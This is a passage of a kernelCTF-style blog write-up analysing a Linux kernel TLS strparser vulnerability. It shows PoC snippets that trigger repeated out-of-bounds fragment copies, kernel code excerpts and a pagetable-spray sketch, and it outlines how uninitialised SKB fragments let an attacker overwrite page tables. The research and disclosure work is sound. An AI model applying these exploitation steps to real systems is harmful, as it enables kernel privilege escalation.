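size_t model_read_sock(struct model_skb *queue, size_t n, model_actor actor)
{
    size_t eaten = 0;

    assert(actor != NULL);
    for (size_t i = 0; i < n; i++) {
        if (queue[i].eaten)
            continue;
        if (actor(&queue[i]) <= 0)
            break;
        queue[i].eaten = 1;
        eaten++;
    }
    return eaten;
}

/* Assumed actor behaviour for this PoC: a short SKB is an incomplete
 * header but still counts as consumed; a garbage SKB is a parse error,
 * which tls_strp_copyin() reports as 0 bytes used. */
int model_tls_actor(const struct model_skb *skb)
{
    return skb->len < 13 ? (int)skb->len : 0;
}
```

Running the loop over a queue of { 1 byte, 0x8000 bytes } eats only the first SKB. Running it again eats nothing, so the garbage SKB stays at the head of the queue and gets re-parsed every time.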

The Second Hurdle - Triggering tls_strp_copyin_frag() Multiple Times

I struggled on this step for a while. I actually still haven't figured out why my initial approach doesn't work (but in the grand scheme of things, it doesn't matter, because I still triggered the vulnerability a different way lol).

After sending the garbage data, we know that the next bit of data we send will cause re-processing of the garbage data (since it remains in the TCP receive queue). In my PoC, I did this as follows:

    // Two bytes out-of-band sent to the client TLS socket.
    send(client, garbage, 2, MSG_OOB);

    // 0x8000 bytes of garbage sent to the client TLS socket.
    // Since MSG_OOB is not set, this won't coalesce with the previously sent data.
    send(client, garbage, 0x8000, 0);

    // Trigger processing of the garbage data again, using `MSG_OOB`
    // cuz without `MSG_OOB` it doesn't work for whatever reason
    send(client, garbage, 1, MSG_OOB);

This does work. It triggers re-processing of the garbage data, which will cause tls_rx_msg_size() to return an error inside tls_strp_copyin_frag().

But... that's it. It only works this one time. If I try to send more data the same way, tls_strp_read_sock() just never executes again. I haven't looked too deeply at this, but I checked the following:

The TLS parser isn't aborted (i.e. tls_strp_abort_strp() isn't called).
tls_rx_msg_size() returns an error for sure, so it's not like the SKBs are being consumed out of the TCP receive queue.

Overall, I didn't need to worry about it too much. After playing around and auditing the socket receive code a bit more, I came across a slightly different solution that allowed me to trigger tls_strp_copyin_frag() repeatedly.

Update: I figured it out!!

I haven't looked at the code to see where the packets were being dropped, but after my PoC enables copy mode on the TLS parser, I reset the socket receive buffer size to the highest possible value like this:

setsockopt(conn, SOL_SOCKET, SO_RCVBUF, &(int){0xffffffff}, sizeof(int));

After that, sending 1 byte of OOB data over and over again correctly triggers tls_strp_read_sock() just as expected.

I assume there's some code in the TCP socket layer that drops packets once the receive buffer is completely full. Maybe I'll investigate later.
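
If you want to see what the kernel actually granted after a call like that, you can read the option back. Below is a minimal sketch with a hypothetical helper name (`model_set_rcvbuf()`). It relies only on the behaviour documented in socket(7): the kernel doubles the requested value, caps it at net.core.rmem_max, and getsockopt() reports the resulting size.

```c
#include <assert.h>
#include <sys/socket.h>

/* Hypothetical helper: request `want` bytes of receive buffer on `fd` and
 * return what the kernel reports afterwards, or -1 on failure. */
static int model_set_rcvbuf(int fd, int want)
{
	int got = 0;
	socklen_t len = sizeof(got);

	assert(fd >= 0);
	if (setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &want, sizeof(want)) < 0)
		return -1;
	if (getsockopt(fd, SOL_SOCKET, SO_RCVBUF, &got, &len) < 0)
		return -1;
	return got;	/* effective size, after doubling and clamping */
}
```

Printing the return value before and after the change is a quick way to confirm that the buffer really grew on your test machine.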

Receiving Data While Receiving Data (?)

As it turns out, the following callpath also triggers tls_strp_read_sock():

tls_sw_recvmsg() -> tls_rx_rec_wait() -> tls_strp_check_rcv() -> tls_strp_read_sock()

Here, tls_sw_recvmsg() will be triggered whenever we attempt to receive the data on the TLS socket. I do this in a loop to trigger tls_strp_copyin_frag() repeatedly:

for (int i = 0; i < 40; i++) {
    recv(conn, buf, 0x100, MSG_DONTWAIT);
}

It is crucial that we set MSG_DONTWAIT here. To understand why, let's take a look at tls_rx_rec_wait():

static int
tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
		bool released)
{
	// [ ... ]
	while (!tls_strp_msg_ready(ctx)) {
		// [ ... ]
		// Faith: tls_strp_check_rcv() here calls tls_strp_read_sock()!
		if (!skb_queue_empty(&sk->sk_receive_queue)) {
			tls_strp_check_rcv(&ctx->strp);
			if (tls_strp_msg_ready(ctx))
				break;
		}

		// [ ... ]
		ret = sk_wait_event(sk, &timeo,
				    tls_strp_msg_ready(ctx) ||
				    !sk_psock_queue_empty(psock),
				    &wait);
		// [ ... ]
	}
	// [ ... ]
}

The function will first check if a full TLS record is ready using tls_strp_msg_ready(). This will obviously not be true in our case.

It will then call tls_strp_check_rcv(), which is what ends up calling tls_strp_read_sock() for us. If after this, a full TLS record is still not ready (spoiler: it won't be), then the function just blocks until it's woken up.

We could wake it up using a signal, or by setting the receive timeout to a low value... Or alternatively, we just set MSG_DONTWAIT, which will prevent the function from blocking.

We don't care whether the receive itself succeeds. All we want is to be able to call tls_strp_read_sock(), which we've already achieved here!
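
The effect of MSG_DONTWAIT is easy to see on an ordinary socket. The sketch below uses a plain AF_UNIX socketpair rather than a kTLS socket (that's an assumption made to keep it self-contained), and `model_dontwait_returns_immediately()` is a hypothetical name. On a socket with nothing to read, recv() with MSG_DONTWAIT fails straight away with EAGAIN or EWOULDBLOCK instead of sleeping.

```c
#include <assert.h>
#include <errno.h>
#include <sys/socket.h>
#include <unistd.h>

/* Returns 1 if a MSG_DONTWAIT recv() on an empty socket came back
 * immediately with EAGAIN/EWOULDBLOCK, 0 otherwise, -1 on setup failure. */
static int model_dontwait_returns_immediately(void)
{
	int sv[2];
	char buf[0x100];
	ssize_t n;
	int ok;

	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
		return -1;

	/* Nothing was sent, so a blocking recv() would sleep here. */
	n = recv(sv[0], buf, sizeof(buf), MSG_DONTWAIT);
	assert(n <= (ssize_t)sizeof(buf));
	ok = (n == -1 && (errno == EAGAIN || errno == EWOULDBLOCK));

	close(sv[0]);
	close(sv[1]);
	return ok;
}
```

In the PoC the same flag serves a different purpose: the receive path still runs its parsing step first, and the flag only keeps the call from blocking afterwards.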

Going back to my PoC, I trigger tls_sw_recvmsg() in a loop so that we can trigger tls_strp_copyin_frag() over and over again, triggering the vulnerability. With my PoC, on the 8th call to tls_strp_copyin_frag(), it triggers a NULL pointer dereference.

The Path to Exploitation

In order to understand how to exploit this vulnerability, we need to understand why we're seeing a NULL pointer dereference.

Source of the NULL Pointer Dereference

First, from looking at the KASAN splat, we know that the NULL pointer dereference occurs when tls_strp_copyin_frag() calls skb_copy_bits():

static int tls_strp_copyin_frag(/* ... */)
{
	// [ ... ]
	if (!strp->stm.full_len) {
		// Faith: NULL pointer dereference occurs inside `skb_copy_bits()`
		WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
					   skb_frag_address(frag) +
					   skb_frag_size(frag),
					   chunk));
		// [ ... ]
	}
	// [ ... ]
}

Looking back at tls_strp_read_copy(), which is the function we used to turn on copy mode, remember that it allocates 5 fragments for us in the strp->anchor SKB's frags array:

static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
{
	// [ ... ]
	// Faith: TLS_MAX_PAYLOAD_SIZE is 4 pages, and adding PAGE_SIZE to
	// it makes 5 pages
	need_spc = strp->stm.full_len ?: TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE;

	for (len = need_spc; len > 0; len -= PAGE_SIZE) {
		page = alloc_page(strp->sk->sk_allocation);
		if (!page) {
			tls_strp_flush_anchor_copy(strp);
			return -ENOMEM;
		}

		// Faith: this function fills in the `frags` array of the anchor SKB
		skb_fill_page_desc(strp->anchor, shinfo->nr_frags++,
				   page, 0, 0);
	}
	// [ ... ]
}
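
As a quick sanity check on the "5 pages" claim, the loop bound can be replayed in user space. This is only a sketch: the `MODEL_*` constants assume 4 KiB pages and a 16 KiB (1 << 14) TLS_MAX_PAYLOAD_SIZE, and `model_count_anchor_frags()` is a hypothetical name.

```c
#include <assert.h>

#define MODEL_PAGE_SIZE            4096		/* assumption: 4 KiB pages */
#define MODEL_TLS_MAX_PAYLOAD_SIZE (1 << 14)	/* assumption: 16 KiB */

/* Counts how many times the allocation loop above would run. */
static int model_count_anchor_frags(int full_len)
{
	int need_spc = full_len ? full_len
				: MODEL_TLS_MAX_PAYLOAD_SIZE + MODEL_PAGE_SIZE;
	int nr_frags = 0;

	assert(full_len >= 0);
	for (int len = need_spc; len > 0; len -= MODEL_PAGE_SIZE)
		nr_frags++;	/* one page, one frags[] slot */
	return nr_frags;
}
```

With `full_len == 0` (no record length known yet), the loop runs for 20480, 16384, 12288, 8192 and 4096, so five slots of the frags array get filled.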

Let's set a breakpoint in tls_strp_copyin_frag() and inspect the frags array:

The 5 fragments that have been allocated are visible above. However, the remaining 12 fragments just have all of their data set to 0.

Now we can understand why this results in a NULL pointer dereference. When skb_copy_bits() attempts to write the data from in_skb to the 6th fragment (which is out-of-bounds, accessed via our PoC that triggers the vulnerability), it will read a NULL netmem pointer and treat it as the page to write to. That's what triggers the NULL pointer dereference.
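
Here is a toy model of that lookup. It is a sketch under two stated assumptions: the slot is picked by dividing the number of bytes already stored by the page size, and the array has 17 slots (the 5 + 12 seen above). All `model_*` names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE     4096u
#define MODEL_MAX_SKB_FRAGS 17u		/* 5 allocated + 12 empty slots */
#define MODEL_ALLOCATED     5u

struct model_frag {
	void *page;	/* NULL for slots that were never filled in */
};

/* Fill the first 5 slots with a dummy page pointer, leave the rest NULL. */
static void model_init_frags(struct model_frag *frags, void *dummy_page)
{
	assert(dummy_page != NULL);
	for (size_t i = 0; i < MODEL_MAX_SKB_FRAGS; i++)
		frags[i].page = i < MODEL_ALLOCATED ? dummy_page : NULL;
}

/* Returns the page that the next write would target, given how many
 * bytes are already stored (assumed index: bytes_stored / page size). */
static void *model_next_page(const struct model_frag *frags,
			     size_t bytes_stored)
{
	size_t idx = bytes_stored / MODEL_PAGE_SIZE;

	assert(idx < MODEL_MAX_SKB_FRAGS);
	return frags[idx].page;
}
```

As long as fewer than 5 pages' worth of data is stored, the lookup returns a real page. Once 5 * 4096 bytes are stored, it lands on slot 5 (the 6th fragment) and returns NULL, which is the pointer the copy then tries to write through.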

The question is, can we influence the 6th fragment somehow?

The Big Hint

After spending a couple of hours on this, I decided to ask about the vulnerability on the kernelCTF Discord server. A couple of hours after that, lion responded with a really nice hint:

With that hint in mind, I decided to take a look at exactly how the frags array initialization works.

We know that it's allocated inside the strp->anchor SKB. I found the allocation code in tls_strp_init():

int tls_strp_init(struct tls_strparser *strp, struct sock *sk)
{
	memset(strp, 0, sizeof(*strp));

	strp->sk = sk;

	strp->anchor = alloc_skb(0, GFP_KERNEL);
	if (!strp->anchor)
		return -ENOMEM;

	INIT_WORK(&strp->work, tls_strp_work);

	return 0;
}

I then proceeded to study alloc_skb() really closely. I won't dive too deeply into the code, but it essentially does the following things that are important to us:

1. Uses kmem_cache_alloc_node() to allocate space for the SKB itself from a specific SKB cache.
2. Uses kmalloc_reserve() to reserve space for the struct skb_shared_info structure of the SKB. This structure is where the frags array lives.
3. Uses memset() to zero out the SKB structure up until the tail field.
4. Uses memset() to zero out the shared info structure up until the dataref field.

The step that's most important to us is step 4. To understand why, let's look at the struct skb_shared_info structure:

struct skb_shared_info {
	// [ ... ]
	atomic_t	dataref;

	// [ ... ]

	/* must be last field, see pskb_expand_head() */
	skb_frag_t	frags[MAX_SKB_FRAGS];
};

Evidently, if alloc_skb() only zeroes out up to the dataref field, it leaves the frags array completely uninitialized!
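
The same pattern is easy to reproduce in user space. The sketch below uses a made-up, much smaller stand-in for the structure (`model_shared_info`, with hypothetical fields in front of `dataref`), pre-fills it with a poison byte to simulate stale heap contents, and then zeroes only the bytes that precede `dataref`.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MODEL_MAX_SKB_FRAGS 17

struct model_frag {
	void *page;
	unsigned int len;
	unsigned int offset;
};

/* Simplified stand-in: the real structure has more fields before dataref. */
struct model_shared_info {
	unsigned char flags;
	unsigned short nr_frags;
	int dataref;		/* atomic_t in the kernel */
	struct model_frag frags[MODEL_MAX_SKB_FRAGS];	/* last field */
};

/* Zero everything before `dataref`, then set the reference count.
 * Nothing after `dataref` is touched, so `frags` keeps its old bytes. */
static void model_init_shinfo(struct model_shared_info *shinfo)
{
	assert(shinfo != NULL);
	memset(shinfo, 0, offsetof(struct model_shared_info, dataref));
	shinfo->dataref = 1;
}
```

If the memory is filled with 0x41 before calling `model_init_shinfo()`, `nr_frags` reads as 0 afterwards while every byte of `frags` is still 0x41. In the kernel, those leftover bytes are whatever the previous owner of that heap chunk wrote there.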

Heap Spraying Primitives

After a lot of reading through the TCP, UDP, and UNIX sockets code, I found that using the splice syscall with tcp_sendmsg_locked() allows me to spray SKBs with 6 fragments in their shared info structure by opening hundreds of sockets. They can then be freed by just closing the sockets.

While playing around with implementing this, I talked to Pumpkin, who also coincidentally started analyzing the vulnerability after seeing my first tweet.

Pumpkin told me that they managed to do the following:

1. Spray a bunch of SKBs with 6 fragments, and then free them all. This causes the shared info structures to be allocated, as well as the backing pages for each fragment.
2. Set up a TLS socket. This will cause strp->anchor to be allocated, and the shared info structure should allocate on top of one of the previously sprayed SKB's shared info structures. This means that the frags array will contain a stale pointer in the 6th fragment.
3. Spray a bunch of pagetables, presumably by calling mmap a whole bunch of times. I haven't done this before so I need to learn how this works. These pagetables should end up on the backing pages that were used for the fragments in step 1.
4. Trigger the vulnerability.

Once tls_strp_copyin_frag() reaches the 6th fragment (i.e. the out-of-bounds fragment), it will attempt to copy the in_skb data to the page pointer of the 6th fragment.

Since this fragment is technically uninitialized data from an older freed SKB, the page pointed to by the stale page pointer actually ends up being one of the pages reclaimed by the pagetables that they sprayed in step 3.

This effectively overwrites pagetable entries with arbitrary data. I'm sure this primitive leads to an easy exploit (I wouldn't know, I've never done this before 😅).
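
For the pagetable spray itself, here is a minimal sketch of the general idea as I understand it. It is not taken from Pumpkin's exploit or from mine. It assumes x86-64 with 4 KiB pages, where one last-level page table covers a 2 MiB window, so touching one byte in each 2 MiB window of a large anonymous mapping should make the kernel allocate a separate page-table page per window. `model_spray_pagetables()` and `MODEL_PT_SPAN` are hypothetical names.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

#define MODEL_PT_SPAN (2u * 1024 * 1024)	/* assumption: 2 MiB per table */

/* Reserve `count` 2 MiB windows in one mapping and touch one byte in
 * each. Returns the base address, or NULL if the mapping failed. */
static void *model_spray_pagetables(size_t count)
{
	size_t total = count * MODEL_PT_SPAN;
	unsigned char *base;

	assert(count > 0);
	base = mmap(NULL, total, PROT_READ | PROT_WRITE,
		    MAP_PRIVATE | MAP_ANONYMOUS | MAP_NORESERVE, -1, 0);
	if (base == MAP_FAILED)
		return NULL;

	/* The first write to each window faults in one data page and,
	 * under the assumption above, one page-table page for it. */
	for (size_t i = 0; i < count; i++)
		base[i * MODEL_PT_SPAN] = 1;
	return base;
}
```

Whether those page-table pages actually land on the freed fragment pages depends on the page allocator's state at that moment, which this sketch makes no attempt to control.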

Update: I learned that this primitive is extremely powerful. I wrote a full exploit for the lts-6.12.48 kCTF instance. You can find it here!

The End

And that's it! In this post, I ended up covering the following:

An analysis of the latest kCTF exploit submission (patch commit)
The steps I took to recreate the PoC that triggers the vulnerability
Some thoughts about how to escalate the PoC into a full exploit (and with some help from others, I finally did it!)

If you have any questions about anything in this post, feel free to contact me on Twitter. My DMs are always open.
